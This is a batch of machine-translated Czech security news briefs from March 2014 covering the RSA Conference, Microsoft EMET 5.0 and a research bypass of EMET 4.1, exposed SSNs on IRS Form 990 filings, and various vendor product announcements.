4.3.2014 Bezpečnost
Stejně jako vědci zveřejní jejich úspěšný pokus o vytvoření útoku kód pro obcházení ochran na nejnovější verzi Microsoft Enhanced Experience Toolkit zmírňování (v4.1), Redmond gigant oznámil náhledu vydání Emet 5.0.

"EMET předpokládá, že nejvíce společných akcí a techniky protivníci mohou používat v ohrožení počítače, a mohou pomoci chránit počítač tím, že odkloní, ukončení, blokování a zrušení platnosti těchto opatření a technik. V posledních 0-dnů, to bylo účinné zmírnění proti paměti korupce, "Chris Betz, ředitel Microsoft Security Response Center v důvěryhodné Computing Group společnosti Microsoft vysvětlil v blogu. Vývojáři z Emet technický tým společnosti jsou v současné době prokazují staré i tuto novou verzi bezpečnostního softwaru na RSA Conference v současné době koná v San Franciscu. Oni jsou také volání na uživatele vyzkoušet uvolňování a nabídnout zpětnou vazbu o nových funkcí a vylepšení. Dvě nové funkce ochrany zavedené v Emet 5.0 Technické Preview - na vrcholu 12 vestavěných zabezpečení migrace zahrnuto ve verzi 4.1. -. Jsou redukce útoku (ASR) a Export Address Table Filtrování Plus (EAF +) . Jak už název sám o sobě říká, útok Povrchová Snížení si klade za cíl snížit útoku aplikací "To může být použit jako mechanismus pro blokování použití z několika specifických modulů nebo plug-inů v rámci aplikace, "tým vysvětluje . "Například, můžete nastavit Emet, aby se zabránilo Microsoft Word načítání Adobe Flash Player plug-in, nebo s podporou bezpečnostních zón, můžete použít Emet, aby se zabránilo Internet Explorer načítání Java plug-in na internetu zóně Webové stránky, zatímco pokračuje, aby Java na webových stránkách Intranet Zone. Adobe Flash Player a Java plug-iny nejsou jediní, můžete blokovat - funkce umožňuje uživateli konfigurovat tak, aby jeho nebo její preference, a to jak pokud jde o plug- iny a bezpečnostní zóny. "EOP + konsoliduje ochranu na nižší úrovni modulů a zabraňuje určitým těžební techniky používané pro vytváření dynamických ROP miniaplikace v paměti z vývozních tabulkách" se dále vysvětleno. funkce nabízí řadu dalších ochranných opatření, jako jsou dodatečné kontroly integrity na zásobník registrů a zásobníku limity při exportu tabulky jsou čteny z některých modulů na nižší úrovni, a prevence paměťových operace čtení na chráněných vývozních tabulek, pokud pocházejí z podezřelých modulů. Dodatečné kalení a výchozí nastavení zmírnění jsou také zahrnuty a budou hodnoceny z hlediska začlenění v konečné verzi.


Neziskové daňové formuláře zaslané podle IRS vystavit 630.000 SSNs
4.3.2014 Bezpečnost
Odhaduje se, že 630.000 čísla sociálního zabezpečení (SSNs) na nezisková daňové organizace "vrátí-Form 990s-byly zveřejněny on-line charitativní organizace a IRS od roku 2001, takže nechráněné spotřebitele v nebezpečí, že se stanou obětí krádeže identity, říkají, že výsledek výzkumu Identity Finder. rozdíl od osobních daňových přiznání na formuláři 1040, formulář 990s jsou veřejné dokumenty. Vzhledem k tomu, IRS nemá redigovat osobní údaje o původních formách, citlivé údaje, které patří do stipendijního příjemci, dárci, správců a zaměstnanců zůstává ve veřejné doméně. V některých případech, jména, plné adresy a detailní informace o transakci doprovázet SSNs. Navíc účetní organizací, které poznaly sebe pomocí jejich SSN, spíše než jejich Zpracovatel Daňové identifikační číslo (PTIN), byly také vystaveny. Mezi nejčastější pachatelé patří :

Advokacie organizace
Sdružení absolventů
Základy Společenství a stipendia
Soukromé nadace
Výzkumný tým Identity Finder byl schopen zjistit informace o vyhledávání s citlivou Solution Manager dat více než 3,8 milionů 990 formulářů mezi 2001 a první polovině roku 2013. sice alarmující množství dostupných osobních údajů je stále velkým problémem, Identity Finder naučil že dochází k pokroku na ochranu dat na novější formy:. procento organizací, které jsou zveřejněny alespoň jeden SSN se snížil z 16,6 procenta v roce 2001 na základě jednoho procenta v roce 2013 však celkový počet SSNs vystavených nadále roste rok co rok , a IRS "Úřad pro ochranu soukromí a informace odmítl odstranit existující SSNs z veřejných dokumentů. Problém exponovaných citlivých dat na 990 forem se nezlepšuje, ale zhoršuje při snižující se rychlosti. Tam bylo více než 11.000 nechráněné SSNs na 990 forem v loňském roce a 630.000 čísla sociálního pojištění stále zůstávají k dispozici pro zloději identity. Neziskové organizace, které se učí vydali SSNs by měl varovat postižených, že jejich jména a SSNs jsou součástí dokumentu o veřejné záznam, a že mohou být vystaveni zvýšenému riziku podvodného zneužití totožnosti. Dále, IRS by měly přijmout všechny dostupné kroky k odstranění SSNs z těchto veřejných listin. Chcete-li zobrazit celou zprávu si přečtěte návrhy pro organizace a spotřebitele, a používat Identity Finder EIN vyhledávací nástroj zjistit, zda vaše organizace vystavena SSNs on-line, jděte sem


Nové zdarma školení bezpečnostní software on-line kurzy
4.3.2014 Bezpečnost
Forum Software Assurance k dokonalosti v řádu (SAFECode), nezisková organizace pracující s cílem zvýšit důvěru v technologických produktů a služeb prostřednictvím prohlubování účinných metod zajišťování software, oznámila, že vydala nové vzdělávací bezpečnostní software kurzy jako součást své on-line Bezpečnostní inženýrství Školení o programu SAFECode. Security Engineering Školení o SAFECode je online komunita zdroj nabízí bezplatné kurzy bezpečnosti školení dodané prostřednictvím on-demand webová vysílání. Týkající se problematiky mohl zabránit SQL injection k zamezení request Cross Site padělání, kurzy jsou určeny pro použití jako stavební bloky pro ty, kteří chtějí vytvořit ve vlastní vzdělávací program pro jejich rozvojových produktovými týmy, stejně jako zájemce o zlepšení jejich dovedností. Nový kurz k dispozici pro okamžité prohlížení zahrnují:

Katalog Penetrační testování 101: Tento kurz poskytuje základ pro penetrační testování bezpečnosti výrobků. To shrnuje důležité penetrační testování konceptů a sdílí vhled do společných prvků útočníka myšlení.
Cross Site Scripting (XSS) 101: Tento kurz poskytuje divákům se základním pochopení základních koncepcí XSS. To pomůže divákům pochopit, kde ve webové aplikaci mohou očekávat, že najde XSS a poskytnout doporučení pro prevenci a sanaci XSS.
Secure Java Programming 101: Tento kurz poskytuje základní úvod do zajištění kódování v Javě. Diváci se seznámí s nejčastějšími útoků a nástrah, že Java programátor může setkat, spolu s technikami se jim vyhnout. Je navržen tak, aby výchozím bodem pro ty, Java zabezpečení nového.
Kromě toho, SAFECode uvolní následující předměty v příštích šesti týdnech:
Secure Memory Manipulace v C 101: Tento kurz poskytuje úvod do základní problematiky v bezpečném, kódování v C se zaměřením na bezpečnou manipulaci paměti. Jedná se konkrétně zaměřuje na otázky spojené s tradičním string (char *) manipulace, polí a formátovacích řetězcích.
Použití kryptografie Správná cesta: Tento kurz poskytuje přehled o tom, jak používat kryptografii bezpečným způsobem a zahrnuje témata jako jsou použití hash a rozdíly mezi symetrickým a asymetrickým šifrováním. Poskytuje příklady kryptografie v akci a posiluje význam využití dobře zavedené a uznávané kryptografické sady nástrojů.
Tyto nové bezpečnostní inženýrství Školení o SAFECode kurzy jsou založeny na vzdělávacích materiálů darovaných SAFECode jeho členských firem. Tým technických expertů z celého členství SAFECode přezkoumala a doplněny všechny studijní materiály s cílem zajistit jejich širokou použitelnost napříč různých vývojových prostředích.


Qualys představuje kontinuální monitoring cloud služby
4.3.2014 Bezpečnost
Qualys představil kontinuálního monitorování , nejnovější přírůstek do své QualysGuard Cloud Platform, na konferenci RSA v San Franciscu.

Tato nová nabídka poskytuje organizacím schopnost proaktivně identifikovat hrozby a neočekávané změny v Internet zařízení směřujících v rámci svých DMZ, prostředí cloud-based a webových aplikací před tím, než jsou porušeny útočníky. To přináší nové paradigma pro správu slabých míst, posílení zákazníkům průběžně sledovat kritické majetek po celou dobu jejich obvodu a okamžitě se upozornil na nesrovnalosti, které by je mohly vystavit na kybernetické útoky. Ve MarketScope pro posouzení zranitelnosti, Gartner analytik Kelly Kavanagh poznamenal, "Gartner zranitelnost Činnosti životní cyklus řízení jsou bezpečné konfigurace aktiv IT, pravidelné hodnocení zranitelnosti a dodržování konfigurace bezpečnostní politiky, sanace zranitelnosti nebo problémy s konfigurací zabezpečení a průběžného monitorování pro detekci škodlivých události nebo činnosti. používání výrobků nebo služeb jako VA nejlepší praxe byla začleněna do řady normativních režimů dodržování ... zejména, Národní institut pro standardy a technologie (NIST) 800-53 požadavky na "kontinuální monitorování" slouží jako urychlovač pro frekvenci VA použití. "

Postaveno na QualysGuard Cloud platformu používá většina firem z žebříčku Fortune 1000 a tisíce firem po celém světě, tato nová služba umožňuje společnostem, aby průběžně sledovat: Hostitelé a zařízení vystavené na internetu - vidět kdykoliv systémy se objeví, zmizí, nebo se systémem neočekávané operační systémy. Digitální certifikáty - ke sledování SSL certifikátů používaných v systémech vědět, jestli jsou slabé nebo self-signed, a když se to skončit. porty a služby spuštěné v každém systému - mít přehled o kterém síťové porty jsou otevřený, které protokoly jsou používány, a zda se v průběhu času mění. Chyby na hostiteli nebo aplikací - vědět, když se objeví slabá místa (nebo znovu), zda mohou být využity, a jsou-li k dispozici záplaty. aplikace instalované na obvodové systémy - najít se, když se aplikace software nainstalovány nebo odebrány z těchto systémů. Když Nepřetržité monitorování detekuje změny v obvodu, které by mohly vést k vykořisťování, upozorní odpovědný IT personál přidělený do těchto aktiv, aby přijaly vhodná opatření ke zmírnění. Okamžité oznámení poskytuje kontinuální monitoring uvolní bezpečnostní týmy ze zpoždění a zátěž čekání na plánované skenování okna a probírat zpráv. "Cloud rozšiřuje hranice podnikové obvodu zahrnout každý prohlížeče, zařízení nebo aplikace, která se dotýká Internetu, nás opouští více vystaveny kybernetických útoků, než kdy jindy, "řekl Philippe Courtot, předseda představenstva a generální ředitel Qualys." S naší průkopnické Průběžné monitorovací služby, mohou společnosti vidět jejich obvodu, jak dnešní hackeři dělat, aby hrozby mohou být identifikovány a řešeny před se promění porušení. " QualysGuard Nepřetržité monitorování je k dispozici hned v Beta pro všechny zákazníky. Obecná dostupnost je naplánováno na 27.března 2014. To je prodáváno jako roční předplatné na základě počtu obvodové IP, který je monitorován, začíná na 295 dolarů pro malé a střední podniky a 1995 dolarů pro větší podniky. První verze této služby zahrnuje kontinuální monitorování síťových zařízení a další vydání bude zahrnovat monitoring webových aplikací.


Identifikovat a opravit chyby zabezpečení vašich SSL certifikátů
3.3.2014 Zranitelnosti
Na tuto měnu oznámil tuto měnu certifikát inspektora , nástroj určený pro rychlé vyhledání problémů v konfiguraci certifikátů a provádění, a poskytuje v reálném čase analýzu celého certifikátu krajiny organizace, včetně ukončení pracovního poměru koncových bodů protokolu SSL.

SSL / TLS certifikáty jsou klíčovým obrana proti nežádoucímu dohledu on-line aktivity uživatelů. Přesto až příliš často správci systému nepodaří správně nakonfigurovat certifikáty, nevědomky odchodu otevřené zranitelnosti. Držet krok s nejnovějšími bezpečnostními osvědčených postupů, jakož i sledování certifikátů je náročný úkol, zejména pro podniky, které spravují tisíce certifikátů. Často, manuální sledování procesů se používají, které zavádějí lidské chyby a způsobit prostoje nebo neznámá slabá místa zabezpečení, jako jsou konfigurace s kódové soupravy odolné vůči zločinu, BEAST, PORUŠENÍ nebo jiné útoky. V ostatních případech, oddělení mimo to by mohlo nasadit své vlastní certifikáty , vytvoření slepé místo pro administrátory. To může také vést k konfiguračních problémů, které downgrade účinnost SSL certifikátů, na kterých organizace spoléhají. Pokud certifikát inspektora, může bezpečnostní profesionálové objevovat zapomenuté, zanedbané nebo chybně nakonfigurován certifikáty, a identifikovat potenciální zranitelná místa, jako jsou slabé klíče, problematické šifer a osvědčení vypršela . Pro každou potenciální hrozby zjištěné, nástroj poskytuje seznam sanacemi. Certifikát inspektor kontroluje síť uživatele odhalovat všechny certifikáty v provozu, kontroluje konfiguraci SSL a provádění, a poté zobrazí výsledky v intuitivním a interaktivním palubní desce. profesionálové zabezpečení může použít nástroj pro:
 

Zjištění jejich bezpečnostní účaří s reálném čase, komplexní přehled o SSL certifikátech a jejich ukončení koncových bodů v celé síti.
Detekce zranitelnosti prostřednictvím skenování pro problematické osvědčení nebo serverových konfigurací a snadno zkontrolovat výsledky pomocí certifikátu inspekční intuitivní dashboard.
Analýza datových bodů bezpečnostních buď kamenivo nebo specifické pro každý certifikát a koncový bod.
Zmírnit zjištěné chyby, jako jsou šelmy, a nedodržování směrnic průmyslu, jako jsou CA / Browser Forum základních požadavků, a to prostřednictvím doporučených kroků.
Obnovit vypršení certifikátů prostřednictvím výslovného dotačního procesu DigiCert je.
Archiv snímků z každé detekční událost dokumentují zlepšení v průběhu času.
Run zprávy z libovolného místa s administrativními kontrolami cloud-based DigiCert je.
Pomocí patentovaného algoritmu, certifikát Inspektor analyzuje SSL certifikáty a zánik koncové body pro mnoho bezpečnostních faktorů, včetně:
Slabé klíče, šifry a hašovací algoritmy
Verze SSL / TLS
Vypršení platnosti certifikátů
TLS opětovné projednání
Perfect Forward Secrecy
Konfigurace náchylnost k trestné činnosti, PORUŠENÍ, BEAST atd.
Jména Neshoda server / certifikát
Chybí AIA je.
Pro každý SSL certifikát a ukončení koncový bod, správci obdrží zprávu o zranitelnosti, odpovídající třídy a rychlý seznam osvědčených postupů ke zmírnění zjištěných nedostatků. "Poskytnutím žalovatelné informace o konfiguraci certifikátů a stavu nasazení, v kombinaci s nápravným nástrojů, DigiCert pomáhá organizacím zavřít Rozdíl mezi zakázek certifikátu a bezpečné nasazení certifikátů, "řekl generální ředitel společnosti DigiCert Nicholas Hales. "Nasazení pevně nakonfigurovaných certifikátů je důležitým linii obrany proti unwelcomed dohledu. Certifikát inspektor pomůže organizacím zářit světlo na oblastech spadajících do jejich sítě, které by mohly představovat číhající hrozby. Věříme, že tento nástroj může stavět na úsilí druhých v bezpečnostní komunity s cílem zlepšit on-line důvěru v nové, hmatatelným způsobem. "


Zdarma řízení zranitelnost služeb pro malé a střední firmy
3.3.2014 Zranitelnosti
Tripwire debutoval Tripwire SecureScan, zdarma, cloud-based služeb pro správu zranitelností pro (IP adresy) až 100 Internet Protokolu o vnitřních sítí. Tento nový nástroj umožňuje správu slabých míst snadno dostupné pro malé a střední podniky, které nemusí mít prostředky pro bezpečnostní technologie podnikové třídy.

Menší podniky obvykle mají méně prostředků na investice do bezpečnosti, což je velmi atraktivní pro cyberattackers a podle společnosti Symantec, kybernetickým útokům na malé a střední podniky se zvýšil o 300 procent v roce 2012. Malé a střední podniky často spoléhají na anti-virus software a firewally, ale tyto bezpečnostní kontroly, zatímco užitečný, nestačí, protože nemají odhalit neopravených systémy, které jsou často cílené u cyberattackers. Tripwire SecureScan je komplexní řešení pro správu zranitelností, které nevyžaduje žádné hardware nebo Software musí být instalován a spravován. Organizace všech velikostí mohou využít službu zjistit podrobné informace o síťových zařízení a najít slabá místa v hardwarových a softwarových aplikací, které jsou používány v kybernetickým útokům. Řešení objeví tyto chyby a pak poskytuje uživatelům priorit, Podrobné informace o tom, jak opravit tyto bezpečnostní slabiny. To používá stejný osvědčené podnikové třídy pro skenování zranitelností platformy za Tripwire v produktech zranitelnosti Tripwire IP360 a Tripwire PureCloud Enterprise. . Tyto produkty chrání mnoho z největších a nejvíce citlivé sítí na světě Klíčové SecureScan funkce patří:
 

Volný vnitřní skenování zranitelnosti až 100 zařízení čtyřikrát měsíčně.
Snadná objev ztracené nebo skryté zařízení, které může vyústit v bezpečnostní slepých míst.
Prioritní zranitelnost bodování, který umožňuje nejprve opravit nejdůležitější bezpečnostní problémy.
"Organizace, které žijí" pod hranicí chudoby zabezpečení "jsou řezání zatáček na bezpečnost po celou dobu," řekla Wendy Nather, ředitel výzkumu, podnikání bezpečnostní praxe na 451 Research. "Oni nemusí mít odborné znalosti naladit a používat open source nástroj, a to buď. S komerční produkt k dispozici na nich zdarma vám může pomoci tyto podniky dostat nohu -. V některých případech poprvé "


Ochrana Microsoft Emet lze obejít, vědci ukazují,
3.3.2014 Bezpečnost
Microsoft Enhanced Mitigation Experience Toolkit (EMET) je dobrý kus softwaru a užitečné pro ochranu non-jádra aplikace Microsoft a software třetích stran, ale ochrana nabízí lze také obejít zcela v případě, že útočníci vědí, co dělají, výzkumníci tvrdí z bezpečnostní firmy brómu.

"EMET dodává zvláštní ochrany (pouze pro 32bitové procesy) proti relativně nový hacker techniku ​​známou jako ROP (návrat orientované programování)," brómu Jared Demott vysvětlil v blogu . "ROP vykořisťování založen byl nekontrolovatelný v malware obejít ALSR + DEP ochrany. Většina malware in-the-wild odkryty v loňském roce použili variantu ROP technik. EMET přidává další užitečné ochran (jako síla ASLR a DEP) stejně, ale mnozí z nich jsou již přítomny v jejich nejnovějším operačním systém Windows 8.1. A tak Emet zvláště vyniká u starších platformách, jako je Windows XP. " Stejně jako jakýkoli jiný software, EMET má svá omezení, a vědci chtěli zjistit, zda je schopen vychylování přizpůsobené útoků. Vědci brómu, kteří pracovali s Microsoft v tomto výzkumu, vytvořili útočnou kód využívá staré (a záplatované) používají-po-free Internet Explorer chyba (CVE-2012 - 4969), aby se vyhnula všem 12 Emet v ochran. Tam je veřejná Metasploit využít modul pro tuto chybu, ale to je blokován Emet. Výzkumníci na základě oni na sofistikovanější jeden vytvořil Peter Vreugdenhil Exodus inteligence (a zpočátku blokovány bezpečnostní software). "Byli jsme zvědaví, zda využít by mohla být posílena, aby se vyhnula Emet 4.1," řekl výzkumníci. "V první řadě zajímat, chtěli jsme zjistit, jestli bychom mohli vyvinout obecný Emet bypass techniku ​​pro kontrolu zásobníku čepu, protože tato ochrana nebyla veřejně obejít našich znalostí." A oni to udělali. Výsledky jejich výzkumu byly prezentovány v pondělí na konferenci BSides v San Franciscu, a byly uznány společností Microsoft, jehož vývojáři se snaží opravit objevené problémy v příštím Emet verzi. Ti zájem dozvědět se více o brómu v oblasti výzkumu - ale ne útok kód sám o sobě, protože to přirozeně nebyla zveřejněna - si můžete stáhnout whitepaper.


Egnyte jmenuje nové ČSÚ, odhaluje bezpečnostní plán
3.3.2014 Bezpečnost
Dnes na konferenci RSA , Egnyte oficiálně představen Kris Lahiri jako nový Chief Security Officer společnosti a představila svůj FY14 bezpečnostní plán, který upřesňuje plány společnosti na zvýšení globální standard pro bezpečné sdílení souborů v podniku. Kris Lahiri je spoluzakladatelem z Egnyte a byl viceprezident operací před přechodem do své nové role CSO. Před Egnyte, strávil mnoho let v designu a rozmístění rozsáhlé infrastruktury pro Fortune 100 zákazníků Valdero a KPMG Consulting. Kris má B.Tech v inženýrství od Indian Institute of Technology -. Banaras a MS z University of Cincinnati plány Lahiri patří přidání klíčových vylepšení zabezpečení a integrace pro bezpečné možností nasazení, ochraně osobních údajů a průmyslových standardů. Poslední, alarmující odhalení o PRISM a svalnatý programy NSA dali bezpečnost a soukromí top-of-mysl pro podniky. Kromě vládní špionáž novinky, velké úniky dat, hacking incidentů a rozsáhlé výpadky nutí podniky k vyhodnocení moudrost přijetí modelu cloud pouze pro sdílení a ukládání svých obchodních soubory. Lahiri je 2014 bezpečnostní plán se zaměřuje na rozšíření a integrace, aby Egnyte zákazníci s zabezpečený přístup k 100 procent svých obchodních souborů z libovolného zařízení, bez ohledu na to, kde tyto soubory fyzicky umístěny. "Egnyte je jediným řešením sdílení souborů postavený od základů až po uspokojení potřeb podniku," řekl Egnyte co- zakladatel a ČSÚ Kris Lahiri. "Jak se trh vyvíjí, tak se na potřeby našich zákazníků, a nic není životně důležité pro podnikání, než je bezpečnost své nejcennější - své obchodní údaje. V kombinaci s měnícími se průmyslových standardů, ve kterých jsou podniky s cílem vyhovět, jsme pochopili, jak důležité je sdílet naše cestovní mapu s našimi zákazníky tak, aby pochopili, jak Egnyte plánuje splnit všechny jejich potřeby v oblasti bezpečnosti nyní i do budoucna. " Deployment Podle Nedávný průzkum z Enterprise Strategy Group, 97 procent z cloudu osvojitelů přednost hybridní řešení. Egnyte je jediným poskytovatelem k tomu, aby on-premise, cloud-jen a hybridní nasazení modely, které umožňují podnikům přístup a uložení 100 procent svých souborů v tom, jak nejlépe odpovídá jejich potřebám. Pozdní v roce 2013, Egnyte zahájila Storage Connect, řešení, které umožňuje podnikům získat výhody cloud při zachování ukládání souborů čistě na obchodní prostory. V roce 2014, Egnyte očekává zvýšení Storage Connect na více rozměrů:

Granulovaný Audit & DLP integrace: Egnyte bude navazovat na stávající DLP řešení instalovaných v prostorách, což umožňuje zákazníkům v regulovaných odvětvích na počest komplexní politiky (tj. regulární výrazy, otisky prstů, strojového učení) o některých údajů, jako jsou informace o kreditní kartě, sociálního zabezpečení čísla, nebo informace o zdraví, a všechny soubory budou kontrolovány s cílem zajistit tyto údaje nebudou sdíleny mimo společnost. IT bude rovněž schopen kontrolovat soubor činností napříč jak mrak a on-premise souborů integrovaným způsobem.
Unified Identity Management: Ve spojení s RSA, Egnyte je také nadšený rozšířit své partnerství s OneLogin zjednodušit správu identit v rámci jednotného rámce, který bez ohledu na nasazení modelu si zákazník zvolí - mrak, v prostorách nebo hybridní.
Údaje

Egnyte je také přidání nových bezpečnostních prvků a integrace v každém bodu dotyku podél životního cyklu dat k dalšímu rozšíření zabezpečení dat, tyto funkce patří:
Endpoint Encryption: Tato schopnost bude zákazníkům poskytovat větší bezpečnost, pokud koncové zařízení je ztracena nebo ukradena, nebo pokud zaměstnanec opustí společnost. Šifrované soubory, které jsou stáhnuty a uloženy v těchto zařízeních budou přístupné pouze s klíčem, a že klíč může být odvolán vzdáleně IT.
Antivirová ochrana: Pro ochranu proti malwaru infikování zákaznických dat v cloudu, bude antivirový schopnost Egnyte v skenovat soubory před tím, než jsou uloženy na zajištění dat je malware zdarma.
Průmysl

V příštích 12 měsících, Egnyte je zaměřen na zvýšení úrovně dodržování předpisů pro několik odvětví, s důrazem na:
SOC2: Egnyte bude dokončit certifikaci pro své interní procesy, s prioritou na lepší auditu a kontroly při vývoji a budují platformu Egnyte.
Správa digitálních práv (DRM): Enhanced DRM zajistí větší kontrolu souborů pro citlivé materiály, jako je duševní vlastnictví nebo právní formy. IT týmy v regulovaných odvětvích budou moci vytvořit politiky o tom, co mohou uživatelé dělat s různými typy souborů.


Fotografie: Inovace Sandbox na konferenci RSA 2014
3.3.2014 Bezpečnost
Inovace Sandbox je obvykle jednou z nejzajímavějších událostí na konferenci RSA a kreslí docela dav, a tento rok není výjimkou.

Dr. Herbert (Hugh) Thompson, Program Židle na konferenci RSA a světově proslulý odborník na bezpečnost IT, který sloužil jako ceremoniář a hostitele:

Koncepce inovací Sandbox je jednoduchý: deset cherry-vybral společnosti mají možnost obrátit se na ošetřujícího dav a předvést své inovativní technologie a služby, a mezi nimi je vybrán jako nejvíce inovativní společnosti na konferenci. Letošní vítěz je RedOwl Analytics , jejichž hlavní produkt, Reveal, je softwarová aplikace, která dává smysl masivní digitalizace podniku, s cílem zvýšit povědomí o situaci s organizací a přímého omezených zdrojů k lidem a problémů, které nejvíce záleží.
Letošní druhý finalista jsou: Bílá Ops detekuje roboty v měřítku pomocí JavaScriptu. Je to boj proti podvodům a bezpečnostní řešení, které funguje stejně dobře pro reklamní průmysl, e-commerce a dodavatelem obchodních systémů podniku. Bluebox Security je stealth startup zaměřený na podnikové mobilní bezpečnosti.

Cylance PROTECT má matematický přístup k identifikaci malwaru, s využitím patentovaných strojového učení techniky místo podpisů a pískovišť. Tato technika efektivně vykresluje nový malware, viry, boty a neznámé budoucí varianty k ničemu. CO3 systémy automatizuje čtyři procesní pilíře reakce na incidenty: přípravu, hodnocení, řízení a hlášení. Díky automatizaci těchto kritických postupy a informování je založen na Incident Response osvědčených postupů, průmysl rámců a požadavky na dodržování předpisů, CO3 zajišťuje účinnost, přesnost a dodržování předpisů, a zároveň snižuje náklady a riziko. Optic by ThreatStream je SaaS-založené Threat Intelligence Platform, která využívá pro spolupráci, platforma pro agregaci globální, místní a důvěryhodné zpravodajství, analyzovat výsledný soubor dat, se automaticky integruje optimalizovaný hrozbách do stávajících systémů zákazníka. Skycure je aktivní mobilní bezpečnostní řešení, které řeší vznikající ohrožení bezpečnosti, aniž by byla ohrožena funkčnost, použitelnost nebo životnost baterie. Skycure umožňuje organizacím, aby přijali přinést své vlastní zařízení (BYOD) trend, ale stále poskytuje silnou ochranu a kontrolu. Defense.Net DDoS SWAT je Distributed Denial of Service (DDoS), služba zmírňování, který pracuje ve spojení s již probíhající zmírnění organizace DDoS infrastruktury s cílem zajistit kontinuitu provozu v největších a nejkomplexnějších útoků. Je zaměřen na "koncentrací rizik", které hlavní organizace čelí s jejich primární řešení zmírnění DDoS. Světlo Cyber ​​poskytuje prediktivní řešení detekce narušení pro organizace, chrání je před cílených hrozeb. Na základě analýzy informací o síti a koncových bodů, profilování normální chování uživatelů sítě a zařízení, Light Cyber ​​detekuje a upozorní na nebezpečné činnosti na počátku životního cyklu útoku, který umožňuje uživateli zablokovat útok před poškozením je hotovo. Cyphort Advanced Defense Threat Platform přesně detekuje a analyzuje hrozby příští generace a pokročilé malware, poskytovat žalovatelné, kontextuální inteligenci, která umožňuje bezpečnostní týmy, aby rychleji, efektivněji a jako chirurgické způsobem jako jejich útočníky reagovat.


Cílová hack pobídl americké firmy utrácet více na kybernetické bezpečnosti
3.3.2014 Hacking
Nový výzkum prováděný tento měsíc ukazuje, že útoky na mezinárodních podniků, včetně bank a maloobchodních gigantů, jako jsou Target, vedla k významnému 60% amerických dotázaných podniků zvýšit jejich kybernetické bezpečnosti rozpočet. Z těch podniků, které plánují zvýšit svou kybernetickou bezpečnost rozpočtu v průběhu následujících 12 měsíců, hlasité 78% uvedlo nedávné útoky, že mají významný vliv na jejich rozhodnutí.

Mezinárodní výzkum také zjistil, že 53% amerických firem dotazovaných se považují hrozbu kybernetických útoků jako jeden ze svých tří největších podnikatelských rizik, zrcadlení nedávné varování od Světového ekonomického fóra, které kybernetické útoky jsou jedním z 5 největších hrozeb, kterým čelí svět 2014. Výzkumné detaily obchodní zájmy a mínění po celém cyber a naznačuje silnou poptávku z velkých globálních společností pro větší inteligenci o povaze nových kybernetických hrozeb a lepší porozumění obchodní zranitelnosti. Nové poznatky přicházejí jako BAE Systems Applied Intelligence zprávy "podnikání a Cyber ​​Threat: vzestup digitální kriminality ", která zjistila, že většina amerických respondentů (82%) očekává, že počet cílených kybernetických útoků zvýšit v průběhu příštích dvou let. To bylo okamžitě nápadné, že organizované skupiny podvodníků byly identifikovány nejvyšší počet respondentů v obou USA (52%) a v rámci skupiny průzkumu jako celku (55%), jako skupina považuje za nejpravděpodobnější montáž útoky. To by mohlo ukazovat na obavy kolem možného poškození počítačových povolen útoků podvodu přesně přírody prožívají Target a další. Výzkum také ukázal, že firmy se domnívají, že jejich zvýšení expozice internetovým hrozbám, způsobené novými způsoby práce, představuje riziko, protože přizpůsobit obchodní praktiky držet krok s hyper-propojeném světě. Například, 72% severoamerických respondentů si myslí, počítačové riziko spojené s mobilními technologiemi bylo významné riziko, ale pouze 61% byli jisti, že pochopili risks.3 Tváří v tvář těmto výzvám, je to alarmující si uvědomit, že značná část respondentů - asi třetina (31% v USA a 30% v celosvětovém měřítku) - stále ještě nevěří, že jejich představenstvo plně pochopili rizika, která Cyber. Chcete-li dále zkoumat, výzkum pak prozkoumal, jaké nástroje respondenti se domnívali, že pomůže jejich desky, aby se více opatření, aby se zabránilo kybernetických útoků. S jasnější pochopení zranitelnosti (prosazovaný 53% respondentů v USA a 50% celkové) a mají inteligenci, o připravovaných hrozeb (44% v USA a 47% celkově) ukázala nejpopulárnější odpovědi. Další poznatky amerických:

Cena: 29% respondentů odhaduje úspěšný kybernetický útok by stálo jejich organizace více než 75 milionů amerických dolarů, dalších 20% uvedlo, že více než US $ 15 milionů.
Příčina útoků: skupina identifikována jako nejpravděpodobnější montáž cílové útoky nejvyšším počtem amerických respondentů bylo organizované skupiny podvodníků (55% respondentů). Američané byli více znepokojeni, které jsou zapojeny do průmyslové špionáže, než jakýkoli jiný trh (47% ve srovnání s 40% v Kanadě, 37% ve Velké Británii a 35% v Austrálii).
Se týkají: Na otázku, co by byli nejvíce znepokojeni v případě úspěšného útoku, nejvíce obyčejná odezva v USA byl ztrátu dat zákazníků (61%). Druhé hodnocení se týkají mimo USA respondentů byla krádež duševního vlastnictví, - s Američany výrazně více zajímají o IP krádeže než jiné trhy (47% respondentů a ve srovnání s 38% v Kanadě, 35% ve Velké Británii, a 43% v Austrálii).
Důvěra: podstatná většina (88%) byli přesvědčeni, ve schopnosti jejich organizace, aby se zabránilo cílených kybernetických útoků. Menší, ale stále velká většina (77%), byli přesvědčeni, ve schopnosti svého sektoru, aby se zabránilo útokům.
Krizové plány: 28% amerických organizací dotazovaných ještě neměl, nebo nevěděli, krizových plánů v případě kybernetického útoku na jejich společnosti. Z těch respondentů, kteří se mají krizové plány, 56% si myslí, tito byli dobře zveřejněny. V Kanadě 70% dotázaných uvedlo, že krizové plány, ale jen 37% z těch, s plány uvedli, že byli dobře zveřejněny.
Konvergence: Z těch respondentů, kteří se setkávají cyber-umožnil podvod, 55% amerických respondentů a 50% kanadských respondentů očekává počítačové hrát stále významnější úlohu v oblasti finančního podvodu.
"Co tento výzkum jasně ukazuje, že americké firmy si stále více uvědomují kybernetickém ohrožení a mají řadu protiopatření v místě. Nicméně, digitální zločin jako celek - nebezpečná kombinace organizovaných skupin pachatelů trestné činnosti s využitím počítačové techniky provádět finanční trestné činnosti - je také velkým problémem, zejména proto, že nejnovější vlna high-profil útoky, "říká Martin Sutherland, výkonný ředitel , BAE Systems Applied Intelligence. "A jako počet cest otevřených zločinci v hyper-propojeném světě se zvyšuje, jsme svědky skutečné hlad ze strany podniků pro jasnější pochopení jejich vlastní zranitelnosti a až na minutu počítačové hrozby inteligence.


CryptoCube: Enterprise šifrovací a autentizační v jednom rackmount
3.3.2014 Šifrování
Na konferenci RSA 2014 Futurex oznámila vydání CryptoCube, účelové, all-in-one rack skříně pro bezpečné šifrování, dešifrování, ověřování a validace citlivých údajů.

